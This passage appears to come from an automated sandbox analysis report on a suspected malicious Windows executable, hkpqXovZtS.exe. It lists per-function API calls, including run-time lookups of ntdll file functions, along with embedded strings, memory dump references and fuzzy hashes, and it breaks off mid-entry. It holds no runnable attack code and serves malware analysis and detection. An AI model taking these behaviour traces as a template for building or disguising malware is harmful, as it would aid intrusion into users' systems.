                                                                                                                • Opcode ID: bf4a6cacaf11a2331b56bfbb5b69d025c4880b8f0f469619230378f04e9d8281
                                                                                                                • Instruction ID: 302fd652b940286076728f1323958995ddfdbf4caa55d64720e4c674d0eba5b4
                                                                                                                • Opcode Fuzzy Hash: bf4a6cacaf11a2331b56bfbb5b69d025c4880b8f0f469619230378f04e9d8281
                                                                                                                • Instruction Fuzzy Hash: 8641C235640352A5CB306B69A8027FB73A4EF65754F68441FE9C1972C0EF6C9DC2829D
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(?,00000000,00000000,?,?), ref: 004190B0
                                                                                                                • GetParent.USER32(?), ref: 004190E8
                                                                                                                • GetParent.USER32(?), ref: 00419119
                                                                                                                • ShowWindow.USER32(?,00000005,?,00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 0041916A
                                                                                                                • ShowWindow.USER32(00000000,00000005,00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 0041918A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow$Parent
                                                                                                                • String ID: RarHtmlClassName
                                                                                                                • API String ID: 2379590318-1658105358
                                                                                                                • Opcode ID: 9c20ba0b380a818c058f9aea319f12467c07711d751414c825dc0ac33fb6d42f
                                                                                                                • Instruction ID: 336c8c3e8339fcc274db4861d5faaa663e954b19a3071e9ea0030f4cefa9c04a
                                                                                                                • Opcode Fuzzy Hash: 9c20ba0b380a818c058f9aea319f12467c07711d751414c825dc0ac33fb6d42f
                                                                                                                • Instruction Fuzzy Hash: 5031D031601609BFEB31AF65DC49EAF7BB9EF84740F10491AF81996250D735AD80CBA8
                                                                                                                APIs
                                                                                                                  • Part of subcall function 022AC676: _free.LIBCMT ref: 022AC69B
                                                                                                                • _free.LIBCMT ref: 022AC6FC
                                                                                                                  • Part of subcall function 022A7A35: HeapFree.KERNEL32(00000000,00000000,?,022A6300), ref: 022A7A4B
                                                                                                                  • Part of subcall function 022A7A35: GetLastError.KERNEL32(?,?,022A6300), ref: 022A7A5D
                                                                                                                • _free.LIBCMT ref: 022AC707
                                                                                                                • _free.LIBCMT ref: 022AC712
                                                                                                                • _free.LIBCMT ref: 022AC766
                                                                                                                • _free.LIBCMT ref: 022AC771
                                                                                                                • _free.LIBCMT ref: 022AC77C
                                                                                                                • _free.LIBCMT ref: 022AC787
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: cf79245f030b3ed4a9fd83b625a98cb3fad30b0f3a246e8cb4ca7d3628d6ff09
                                                                                                                • Instruction ID: 10d3190b653db7fa8506140d2d43bb54d55b4cfe9b52fa5258bd177d964ee5f3
                                                                                                                • Opcode Fuzzy Hash: cf79245f030b3ed4a9fd83b625a98cb3fad30b0f3a246e8cb4ca7d3628d6ff09
                                                                                                                • Instruction Fuzzy Hash: 92117F35960B04FBD520FFF4CC19FCBB79E5F41B00F408D36A29A66859DA28F6048E94
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,022A0915,0229FA72,0229F5AD), ref: 022A0C55
                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 022A0C63
                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 022A0C7C
                                                                                                                • SetLastError.KERNEL32(00000000,?,022A0915,0229FA72,0229F5AD), ref: 022A0CCE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852720340-0
                                                                                                                • Opcode ID: 0359cc336175f1970621a1de65f7d9d72cb28ca05c0e660d9f3cea3e88784e87
                                                                                                                • Instruction ID: f6813886e977ee300e8e341abd556a9089f9bf1fea93a0673d20b91faa2390f0
                                                                                                                • Opcode Fuzzy Hash: 0359cc336175f1970621a1de65f7d9d72cb28ca05c0e660d9f3cea3e88784e87
                                                                                                                • Instruction Fuzzy Hash: 9C01C0739393129F9F2055F4BCA8B6A3657EB043B572007A9F01C859F8EF50493CA554
                                                                                                                APIs
                                                                                                                • __CreateFrameInfo.LIBCMT ref: 0041D06A
                                                                                                                  • Part of subcall function 0041967E: __getptd.LIBCMT ref: 0041968C
                                                                                                                  • Part of subcall function 0041967E: __getptd.LIBCMT ref: 0041969A
                                                                                                                • __getptd.LIBCMT ref: 0041D074
                                                                                                                  • Part of subcall function 0041DC71: __amsg_exit.LIBCMT ref: 0041DC81
                                                                                                                • __getptd.LIBCMT ref: 0041D082
                                                                                                                • __getptd.LIBCMT ref: 0041D090
                                                                                                                • __getptd.LIBCMT ref: 0041D09B
                                                                                                                • _CallCatchBlock2.LIBCMT ref: 0041D0C1
                                                                                                                  • Part of subcall function 00419723: __CallSettingFrame@12.LIBCMT ref: 0041976F
                                                                                                                  • Part of subcall function 0041D168: __getptd.LIBCMT ref: 0041D177
                                                                                                                  • Part of subcall function 0041D168: __getptd.LIBCMT ref: 0041D185
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
                                                                                                                • String ID:
                                                                                                                • API String ID: 3688206559-0
                                                                                                                • Opcode ID: adac1376032219a4d2bfb868507661af3c4362346dcdf8190ac2579787bbb348
                                                                                                                • Instruction ID: 41f91cc97b8cdd72d244d7b1be7b80639e7a0adf2291a42cd0216d34b547817f
                                                                                                                • Opcode Fuzzy Hash: adac1376032219a4d2bfb868507661af3c4362346dcdf8190ac2579787bbb348
                                                                                                                • Instruction Fuzzy Hash: AD1126B5D00209EFDB00EFA1C845AED7BB0FF44314F10856AF814A7261EB789A809F58
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free
                                                                                                                • String ID: *?$kL
                                                                                                                • API String ID: 269201875-3099113692
                                                                                                                • Opcode ID: 85592be7bcee3ab965be2210e7b7ac585b2ae47f3853e059e08f8571b823f5d0
                                                                                                                • Instruction ID: 4959bf6bf1a630012f89e19d6b9b3e549000affefd430cfc8b28df6093423e69
                                                                                                                • Opcode Fuzzy Hash: 85592be7bcee3ab965be2210e7b7ac585b2ae47f3853e059e08f8571b823f5d0
                                                                                                                • Instruction Fuzzy Hash: C0614CB6D1021AAFCB14CFA8C9909EDFBF5EF48310B24816AE855E7704D7759E41CB90
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00408360
                                                                                                                  • Part of subcall function 0040A11F: _wcslen.LIBCMT ref: 0040A125
                                                                                                                • _swprintf.LIBCMT ref: 0040843A
                                                                                                                  • Part of subcall function 0040B8BD: __vswprintf_c_l.LIBCMT ref: 0040B8D0
                                                                                                                • MoveFileW.KERNEL32(?,00000000), ref: 004084A6
                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 004084E9
                                                                                                                  • Part of subcall function 00410823: _wcsncpy.LIBCMT ref: 0041083A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileMove$H_prolog__vswprintf_c_l_swprintf_wcslen_wcsncpy
                                                                                                                • String ID: rtmp%d
                                                                                                                • API String ID: 3681525962-3303766350
                                                                                                                • Opcode ID: 1e2d587bca62f88247727b3b9e5d7c2d8643540f6b84dfb311df528aed711f35
                                                                                                                • Instruction ID: 69edc84b86f412ba0bc4d5e90ee985fc46e0113149e1d6e5ea4475ba2e70aa71
                                                                                                                • Opcode Fuzzy Hash: 1e2d587bca62f88247727b3b9e5d7c2d8643540f6b84dfb311df528aed711f35
                                                                                                                • Instruction Fuzzy Hash: D1414271901219B6CF20EB62CD459DF777CAF41388F0004BBB595B7182EB7C9B85CAA8
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040F2A3
                                                                                                                • GetDlgItem.USER32(?,00000065), ref: 0040F2C7
                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0040F2DC
                                                                                                                • SendMessageW.USER32(?,00000443,00000000,00000000), ref: 0040F2F0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID: LICENSEDLG
                                                                                                                • API String ID: 3888421826-2177901306
                                                                                                                • Opcode ID: a35642039d372273213a1fe99bee06fd2d35902f9b74d97e3d1bf5e1df4b77f2
                                                                                                                • Instruction ID: 2ecf1310ef2f8e42eb6b1dce49f9a550c718bc92f4591b2c0e570435fcc087d6
                                                                                                                • Opcode Fuzzy Hash: a35642039d372273213a1fe99bee06fd2d35902f9b74d97e3d1bf5e1df4b77f2
                                                                                                                • Instruction Fuzzy Hash: 6D216B71100248BADB30AF629C42FA73B2DEB85B54F00543BF905B60D1DA7E9901C72C
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog_malloc
                                                                                                                • String ID: lB
                                                                                                                • API String ID: 1600808285-323450203
                                                                                                                • Opcode ID: 030a801b66dce2c921adb79293409b56d158257f867e3469673c05b2b9060ad7
                                                                                                                • Instruction ID: bf6ea9f9a1acc3d9f1f086f9a60bfa17a1d82c8e39c68d8a0f1b5c27423798e3
                                                                                                                • Opcode Fuzzy Hash: 030a801b66dce2c921adb79293409b56d158257f867e3469673c05b2b9060ad7
                                                                                                                • Instruction Fuzzy Hash: EB31F1B1E00616ABDB14AFA5CC057EB76B8FB14319F10012FE105E7281D7789E80C7AC
                                                                                                                Strings
                                                                                                                • C:\Users\user\Desktop\hkpqXovZtS.exe, xrefs: 022A7DDC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                                • API String ID: 0-979263065
                                                                                                                • Opcode ID: 354f00c3d457f032d653564d2e45db8383434b52604e1d58361e2c3354b36447
                                                                                                                • Instruction ID: 97a1e2c5aa589a0842d6ad3f167310106eb7ac1b69e23c159fdb9709e8416d58
                                                                                                                • Opcode Fuzzy Hash: 354f00c3d457f032d653564d2e45db8383434b52604e1d58361e2c3354b36447
                                                                                                                • Instruction Fuzzy Hash: 9421C272A20306AF9B20AFE59DA4D2FF79EEF003647004915F529CBA44EB70DC10CBA4
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(022910D9,022E4FE8,00000104,?,?,?,022910D9,?), ref: 022916C7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName
                                                                                                                • String ID: NtClose$NtCreateFile$NtQueryInformationFile$NtReadFile
                                                                                                                • API String ID: 514040917-3418994152
                                                                                                                • Opcode ID: b0f2c84d5b6cf6aa1eba000ffe514cf3080d87db465fb827db25e1bfc87a372e
                                                                                                                • Instruction ID: 1fa68bd32c3fa71e1f2f928afc59edecfe4835413e74fa392a35f65869a93f93
                                                                                                                • Opcode Fuzzy Hash: b0f2c84d5b6cf6aa1eba000ffe514cf3080d87db465fb827db25e1bfc87a372e
                                                                                                                • Instruction Fuzzy Hash: AD21F631AB0302ABFF18EFE6EC46E6537E1BF04B217540855E00EDA16CEAA18461DB16
                                                                                                                APIs
                                                                                                                • DialogBoxParamW.USER32(RENAMEDLG,0040D100,?,?,0040E4E1), ref: 0040E45F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogParam
                                                                                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                • API String ID: 665744214-56093855
                                                                                                                • Opcode ID: d0ae7a8254853b446899ced58eb6316af1dde2291dfab6f1df2c15f21608e9d9
                                                                                                                • Instruction ID: f8f97b2682b38a8fc71a6b6bb6a51a983d61d2d2f79ee8623470cc10f718c254
                                                                                                                • Opcode Fuzzy Hash: d0ae7a8254853b446899ced58eb6316af1dde2291dfab6f1df2c15f21608e9d9
                                                                                                                • Instruction Fuzzy Hash: 7811E6B0145245EACB11CF12EC45B923F50AB05340F515833F610B63E0C27A9862EB6D
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(00000000,?,0041DA23,00000000,00423F85,0044AB78,00000000,00000314,?,00420CD2,0044AB78,Microsoft Visual C++ Runtime Library,00012010), ref: 0041D9BC
                                                                                                                • TlsGetValue.KERNEL32(00000007,?,0041DA23,00000000,00423F85,0044AB78,00000000,00000314,?,00420CD2,0044AB78,Microsoft Visual C++ Runtime Library,00012010), ref: 0041D9D3
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041DA04
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$AddressProc
                                                                                                                • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 3000322187-3682587211
                                                                                                                • Opcode ID: 1e250072d4ee9ee132c2fe2c9afd064dd7989dba9f53a573af72b69805a2044b
                                                                                                                • Instruction ID: d25419fe086fd572754ca199c9bbd830b30b0ad25c8b5dff7139db05ecbbb2bd
                                                                                                                • Opcode Fuzzy Hash: 1e250072d4ee9ee132c2fe2c9afd064dd7989dba9f53a573af72b69805a2044b
                                                                                                                • Instruction Fuzzy Hash: 0FF044B0B05216EB9B21AF35EC059AF3B98DF053A03594173F818D6261DF38DD92D6AC
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(00000000,?,0041DAC0,?,0041F249,00419D04,?,?,?,00419D04,00000000,?), ref: 0041DA37
                                                                                                                • TlsGetValue.KERNEL32(00000007,?,0041DAC0,?,0041F249,00419D04,?,?,?,00419D04,00000000,?), ref: 0041DA4E
                                                                                                                • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0041DA7F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$AddressProc
                                                                                                                • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 3000322187-629428536
                                                                                                                • Opcode ID: 14df8e3696460602dad4f7941c6c8cb2faed605fac57cb0e4ee28b8487a80535
                                                                                                                • Instruction ID: 47e50f8651cdd332759b97997f636aa46c801bf21f33db7225eb4d830c239e8b
                                                                                                                • Opcode Fuzzy Hash: 14df8e3696460602dad4f7941c6c8cb2faed605fac57cb0e4ee28b8487a80535
                                                                                                                • Instruction Fuzzy Hash: 56F0F470B04216EA8B20DB75DC049AB3B98DF003E07548173FC18D2260DB29DD8296EC
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,022A5C20,?,?,022A5BE8,022E4FE0,0000003F,?), ref: 022A5C83
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 022A5C96
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,022A5C20,?,?,022A5BE8,022E4FE0,0000003F,?), ref: 022A5CB9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: 73ce73cabe1e247b2b0c55f77db7c7abdbafdcb83587cf29ef001606c4020e19
                                                                                                                • Instruction ID: bd4a6da33755e476be7f7b8797c221fe893731e5da8c753d56be4242be729934
                                                                                                                • Opcode Fuzzy Hash: 73ce73cabe1e247b2b0c55f77db7c7abdbafdcb83587cf29ef001606c4020e19
                                                                                                                • Instruction Fuzzy Hash: D9F08231D51619FBDB12DBD0ED0EBDEBFB9EF40756F004490F901A1158CB748A10DA90
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,02291756,NtCreateFile,022E4000,0229110B,022910D9,00E1D8E8,08C2C900,?,022910D9,?), ref: 02291644
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtSetInformationFile), ref: 02291655
                                                                                                                • GetProcAddress.KERNEL32(022E4020,?), ref: 0229166A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtSetInformationFile$ntdll.dll
                                                                                                                • API String ID: 667068680-3010545110
                                                                                                                • Opcode ID: 83a1bcde81f5a1ed0efd44046f3c15edbc08076c16815332832a3f6d6f127157
                                                                                                                • Instruction ID: 76de984cd848d439f46eeb613293187f5f7893128be8e041de0bf03391416cf6
                                                                                                                • Opcode Fuzzy Hash: 83a1bcde81f5a1ed0efd44046f3c15edbc08076c16815332832a3f6d6f127157
                                                                                                                • Instruction Fuzzy Hash: AAE0A575D94301EFAB09EFE4F80DB1A3BE9BF483817004C69F959C6150D7309520EB25
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd$__amsg_exit
                                                                                                                • String ID: MOC$csm
                                                                                                                • API String ID: 1969926928-1389381023
                                                                                                                • Opcode ID: 8d58c0e8e9140455f9f2f3fa86026452bc6b404060e1518db8010fc8cd5144eb
                                                                                                                • Instruction ID: 8b01a33115fb1e61f5b354125ccd4bd540af3bb44677c38c2222110d3557298b
                                                                                                                • Opcode Fuzzy Hash: 8d58c0e8e9140455f9f2f3fa86026452bc6b404060e1518db8010fc8cd5144eb
                                                                                                                • Instruction Fuzzy Hash: A8E04FB59401049FC710AB65D486BE937A6FB8A318F1509A7E40CC7362E77CD8C1E5CA
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 022AC625
                                                                                                                  • Part of subcall function 022A7A35: HeapFree.KERNEL32(00000000,00000000,?,022A6300), ref: 022A7A4B
                                                                                                                  • Part of subcall function 022A7A35: GetLastError.KERNEL32(?,?,022A6300), ref: 022A7A5D
                                                                                                                • _free.LIBCMT ref: 022AC637
                                                                                                                • _free.LIBCMT ref: 022AC649
                                                                                                                • _free.LIBCMT ref: 022AC65B
                                                                                                                • _free.LIBCMT ref: 022AC66D
                                                                                                                Memory Dump Source
